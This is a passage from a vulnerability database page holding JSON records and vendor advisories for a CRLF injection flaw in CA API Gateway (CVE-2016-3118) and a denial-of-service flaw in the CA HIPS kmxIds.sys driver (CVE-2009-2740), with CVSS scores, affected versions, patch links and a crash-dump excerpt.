wsFVAwUBVwQ4wDuotw2cX+zOAQqaNg//Q3UFXyWWwTCUWubjAJD9XKmwmQ94mN1z Z8nZlDZoAvS72F0PM9IxPs4Y135Gxw6D9mbyOjDKcF1uPaZCCAHyAjsYf+wkwLyq l8ILYq1FPchY6lbwH+nx8U+XHRG0/g+mgGjBa4jDNhItGFVidxFFm1CjPHQkbONq xifyNhkys81InM115ikkhmXEE7CORRwmrtC+kHu/vnZpHO1yw9uUQNn4M41hmW2d 3fJt9D6m5mroBa9qN4Z6Q2GrOY7yRM54mETcEa6mDvh9jtRxhIuXVVmWBG0tI0fG 9+ul46MbNb1oSUQilrrDqlZOfnUvAPhvB2nCwnnO14cuI9pgslomVsXb6L1Td7XR to6lA60Q75GxPJRC8g0OPnq5OSW1WtUf7hnq+jJh0WFHN/zoacKPZiiPilsy9xCq rV4nMEm/MAZeF8nNljn434Z6HugoPcilkjmyk4aZPsZXq43xxO2flsedEubYH8dC 6qc6tkyyAQXXuwazf7cWk+jlCafjXDqSYz70KMRhyWCqMvNXWnlHfyc4TLWxUtU1 3C9YeLsp20RS6TSDTDCpZJMZyhIRN/icg7WA/Sjoh+spV6dZ9JTCB+oXpB7wP+8V t7kcF9hW+Dh/II1OUMN/PXvH72G4M1NyaPuBhFyVsdYU97uwfVGSPBqG2NqMkBlL yBbzOtDOq6s= =rWD3 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201604-0426",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.4"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.2"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.3"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8.0 from 8.3.01"
},
{
"model": "api gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "8.3"
},
{
"model": "api gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "8.4"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8.4.01"
},
{
"model": "api gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "7.1"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "7.1.04"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.2"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.3"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:api_gateway:8.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:api_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:api_gateway:8.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:api_gateway:8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:api_gateway:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:api_gateway:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3118"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Patrick Webster of OSI Security",
"sources": [
{
"db": "BID",
"id": "85867"
}
],
"trust": 0.3
},
"cve": "CVE-2016-3118",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.4,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-3118",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-91937",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Physical",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-3118",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:P/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-3118",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-034",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-91937",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CRLF injection vulnerability in CA API Gateway (formerly Layer7 API Gateway) 7.1 before 7.1.04, 8.0 through 8.3 before 8.3.01, and 8.4 before 8.4.01 allows remote attackers to have an unspecified impact via unknown vectors. Supplementary information : CWE Vulnerability type by CWE-93: Improper Neutralization of CRLF Sequences (CRLF injection ) Has been identified. http://cwe.mitre.org/data/definitions/93.htmlA third party may be affected unspecified. \nAn attacker can exploit this issue to add arbitrary headers to a webpage. This may aid in further attacks. CA has fixes\navailable. Update to the fix version indicated below. All Rights Reserved. One CA Plaza, Islandia,\nN.Y. 11749. All other trademarks, trade names, service marks, and\nlogos referenced herein belong to their respective companies. \n\n-----BEGIN PGP SIGNATURE-----\nCharset: utf-8\n\nwsFVAwUBVwQ4wDuotw2cX+zOAQqaNg//Q3UFXyWWwTCUWubjAJD9XKmwmQ94mN1z\nZ8nZlDZoAvS72F0PM9IxPs4Y135Gxw6D9mbyOjDKcF1uPaZCCAHyAjsYf+wkwLyq\nl8ILYq1FPchY6lbwH+nx8U+XHRG0/g+mgGjBa4jDNhItGFVidxFFm1CjPHQkbONq\nxifyNhkys81InM115ikkhmXEE7CORRwmrtC+kHu/vnZpHO1yw9uUQNn4M41hmW2d\n3fJt9D6m5mroBa9qN4Z6Q2GrOY7yRM54mETcEa6mDvh9jtRxhIuXVVmWBG0tI0fG\n9+ul46MbNb1oSUQilrrDqlZOfnUvAPhvB2nCwnnO14cuI9pgslomVsXb6L1Td7XR\nto6lA60Q75GxPJRC8g0OPnq5OSW1WtUf7hnq+jJh0WFHN/zoacKPZiiPilsy9xCq\nrV4nMEm/MAZeF8nNljn434Z6HugoPcilkjmyk4aZPsZXq43xxO2flsedEubYH8dC\n6qc6tkyyAQXXuwazf7cWk+jlCafjXDqSYz70KMRhyWCqMvNXWnlHfyc4TLWxUtU1\n3C9YeLsp20RS6TSDTDCpZJMZyhIRN/icg7WA/Sjoh+spV6dZ9JTCB+oXpB7wP+8V\nt7kcF9hW+Dh/II1OUMN/PXvH72G4M1NyaPuBhFyVsdYU97uwfVGSPBqG2NqMkBlL\nyBbzOtDOq6s=\n=rWD3\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "BID",
"id": "85867"
},
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "PACKETSTORM",
"id": "136592"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-3118",
"trust": 2.9
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034",
"trust": 0.7
},
{
"db": "BID",
"id": "85867",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "136592",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-91937",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "BID",
"id": "85867"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "PACKETSTORM",
"id": "136592"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"id": "VAR-201604-0426",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-91937"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:19:45.136000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CA20160405-01: Security Notice for CA API Gateway",
"trust": 0.8,
"url": "http://www.ca.com/us/support/ca-support-online/product-content/recommended-reading/security-notices/ca20160405-01-security-notice-for-ca-api-gateway.aspx"
},
{
"title": "CA API Gateway CRLF Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60769"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.ca.com/us/support/ca-support-online/product-content/recommended-reading/security-notices/ca20160405-01-security-notice-for-ca-api-gateway.aspx"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3118"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3118"
},
{
"trust": 0.1,
"url": "https://support.ca.com/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsbpldgpg"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3118"
},
{
"trust": 0.1,
"url": "https://www.ca.com/us/support/ca-support-online/documents.aspx?id=177782"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "PACKETSTORM",
"id": "136592"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "BID",
"id": "85867"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "PACKETSTORM",
"id": "136592"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-04-06T00:00:00",
"db": "VULHUB",
"id": "VHN-91937"
},
{
"date": "2016-04-05T00:00:00",
"db": "BID",
"id": "85867"
},
{
"date": "2016-04-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"date": "2016-04-06T13:39:41",
"db": "PACKETSTORM",
"id": "136592"
},
{
"date": "2016-04-06T01:59:28.840000",
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"date": "2016-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-04-07T00:00:00",
"db": "VULHUB",
"id": "VHN-91937"
},
{
"date": "2016-04-05T00:00:00",
"db": "BID",
"id": "85867"
},
{
"date": "2016-04-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"date": "2021-04-07T17:55:26.013000",
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "136592"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA API Gateway In CRLF Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
],
"trust": 0.6
}
}
VAR-200908-0478
Vulnerability from variot - Updated: 2023-12-18 13:04kmxIds.sys before 7.3.1.18 in CA Host-Based Intrusion Prevention System (HIPS) 8.1 allows remote attackers to cause a denial of service (system crash) via a malformed packet. Computer Associates Host-Based Intrusion Prevention System is affected by a denial-of-service vulnerability because the application mishandles malformed user-supplied input. A remote attacker may exploit this issue to cause denial-of-service conditions. Host-Based Intrusion Prevention System 8.1 is affected by this issue; other versions may also be vulnerable. CA HIPS integrates functions such as firewall, intrusion detection, intrusion protection, operating system security and application control to provide centralized active security protection. -----BEGIN PGP SIGNED MESSAGE-----
CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention System
Issued: August 18, 2009
CA's technical support is alerting customers to a security risk with CA Host-Based Intrusion Prevention System. CA has issued a patch to address the vulnerability.
The vulnerability, CVE-2009-2740, is due to the kmxIds.sys driver not correctly handling certain malformed packets. An attacker can send a malicious packet that will cause a kernel crash. Using Windows Explorer, locate the file "kmxIds.sys". By default, the file is located in the "C:\Windows\system32\drivers\" directory. 2. Right click on the file and select Properties. 3. Select the Version tab. 4. If the file version is less than indicated in the below table, the installation is vulnerable.
File Name Version Size(bytes) Date
kmxIds.sys 7.3.1.18 163,840 June 03, 2009, 12:32:22 PM
Solution
CA has issued the following patch to address the vulnerability.
References
CVE-2009-2740 - HIPS kmxIds.sys remote crash http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2740
CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention System (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=21 4665
Acknowledgement
CVE-2009-2740 - iViZ Security Research Team
Change History
Version 1.0: Initial Release
If additional information is required, please contact CA Support at http://support.ca.com/
If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782
Kevin Kotas CA Product Vulnerability Response Team
-----BEGIN PGP SIGNATURE----- Version: PGP 8.1
iQEVAwUBSosQJJI1FvIeMomJAQFFEAf+IcKJCxu2tj2cO24u8Hp3nQIeCyAAJITU Fdsmn/RRDNKPXm6fCPVbeK7rnvCGRuSmEOXPT+H+Y8S5ruppUqf4kuehkvhaW3N+ m5xjiC4BnACtPO6HE2q4JelgAdb0mKWIWnbn6ydWXKvBKViUQU4cAirCxRw7zj7P lrfm+V6hun7s6FTF7IccdGTJDhxXOCo9Q++FGLaOvaXJiXSS+HvzTM7MzbAEa5yy TosaTPGrnYO8FzQz+P/HFlCYsD6IKjCfMy1C63Qp7xCFWZ6ltJSKEIUYLu/DJlWu z2JUzNXn4lqNXoDLOAuBHawMiJesPXshjFqFG0kdeRxvP4JMUhENOQ== =AsHd -----END PGP SIGNATURE----- . ---------------------------------------------------------------------------------------------------
[ iViZ Security Advisory 09-005 19/08/2009 ]
iViZ Techno Solutions Pvt. http://www.ivizsecurity.com
- Title: CA HIPS kmxids.sys Remote Kernel Vulnerability
- Software: CA HIPS r8.1
--[ Synopsis:
CA HIPS is a Host Based Intrusion Prevention System in which managed agents are deployed on individual hosts to be protected by the HIPS and controlled by the centralized console.
--[ Affected Software:
- CA HIPS r8.1 (possibly older versions too)
Tested on:
- Agent Product Version: 1.5.290
- Agent Engine Version: 1.5.286
--[ Technical description:
When CA HIPS agent processes certain malformed IP packets, it fails to handle certain boundary condition during parsing and pattern matching of the packet. It is possible to force the kernel driver (kmxids.sys) responsible for analyzing each in/out packet to reference invalid/unmapped memory.
The following information is obtained during crash analysis:
CURRENT_IRQL: 2
FAULTING_IP: kmxids+a2f4 f6b8c2f4 8a26 mov ah,byte ptr [esi]
DEFAULT_BUCKET_ID: DRIVER_FAULT
BUGCHECK_STR: 0xD1
TRAP_FRAME: f88ca4f4 -- (.trap 0xfffffffff88ca4f4) ErrCode = 00000000 eax=f88ca754 ebx=81f7415a ecx=00000003 edx=428c200c esi=6e96d603 edi=f6b83264 eip=f6b8c2f4 esp=f88ca568 ebp=f88ca574 iopl=0 nv up ei pl nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206 kmxids+0xa2f4: f6b8c2f4 8a26 mov ah,byte ptr [esi] ds:0023:6e96d603=?? Resetting default scope
LAST_CONTROL_TRANSFER: from 804f7b9d to 80527bdc
STACK_TEXT: f88ca0a8 804f7b9d 00000003 f88ca404 00000000 nt!RtlpBreakWithStatusInstruction f88ca0f4 804f878a 00000003 6e96d603 f6b8c2f4 nt!KiBugCheckDebugBreak+0x19 f88ca4d4 80540683 0000000a 6e96d603 00000002 nt!KeBugCheck2+0x574 f88ca4d4 f6b8c2f4 0000000a 6e96d603 00000002 nt!KiTrap0E+0x233 WARNING: Stack unwind information not available. Following frames may be wrong. f88ca574 f6b832e1 6e96d603 f6b83264 00000003 kmxids+0xa2f4 00000000 00000000 00000000 00000000 00000000 kmxids+0x12e1
The issue can be used to create a Denial of Service condition on each of the host protected by affected versions of CA HIPS agent, however due to the nature of the vulnerability remote code execution is unlikely
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200908-0478",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 2.4,
"vendor": "ca",
"version": "8.1"
},
{
"model": "associates host-based intrusion prevention system",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates host-based intrusion prevention system cf",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "8.11"
}
],
"sources": [
{
"db": "BID",
"id": "36078"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:host-based_intrusion_prevention_system:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kevin Kotas",
"sources": [
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
],
"trust": 0.7
},
"cve": "CVE-2009-2740",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
